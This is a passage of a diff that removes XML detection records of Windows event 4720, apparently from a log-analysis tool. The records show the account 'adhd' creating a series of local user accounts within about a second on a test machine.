-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Heather</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4423</recordid>
-            <time>2020-06-11 22:04:57.136741300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.1367413Z'/&gt;&lt;EventRecordID&gt;4423&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Henry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1063&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Henry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Henry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4417</recordid>
-            <time>2020-06-11 22:04:56.968572700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.9685727Z'/&gt;&lt;EventRecordID&gt;4417&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Juan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1062&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Juan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Juan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4411</recordid>
-            <time>2020-06-11 22:04:56.884637400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.8846374Z'/&gt;&lt;EventRecordID&gt;4411&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Helen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1061&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Helen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Helen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4405</recordid>
-            <time>2020-06-11 22:04:56.797035600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.7970356Z'/&gt;&lt;EventRecordID&gt;4405&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Emily&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1060&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Emily&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Emily</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4399</recordid>
-            <time>2020-06-11 22:04:56.698208100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.6982081Z'/&gt;&lt;EventRecordID&gt;4399&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lawrence&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1059&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lawrence&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lawrence</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4393</recordid>
-            <time>2020-06-11 22:04:56.623698600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.6236986Z'/&gt;&lt;EventRecordID&gt;4393&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brian&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1058&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brian&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brian</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4387</recordid>
-            <time>2020-06-11 22:04:56.541707800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.5417078Z'/&gt;&lt;EventRecordID&gt;4387&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Vincent&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1057&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Vincent&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Vincent</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4381</recordid>
-            <time>2020-06-11 22:04:56.451013000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.4510130Z'/&gt;&lt;EventRecordID&gt;4381&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Larry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1056&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Larry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Larry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4375</recordid>
-            <time>2020-06-11 22:04:56.366306300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.3663063Z'/&gt;&lt;EventRecordID&gt;4375&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Julie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1055&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Julie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

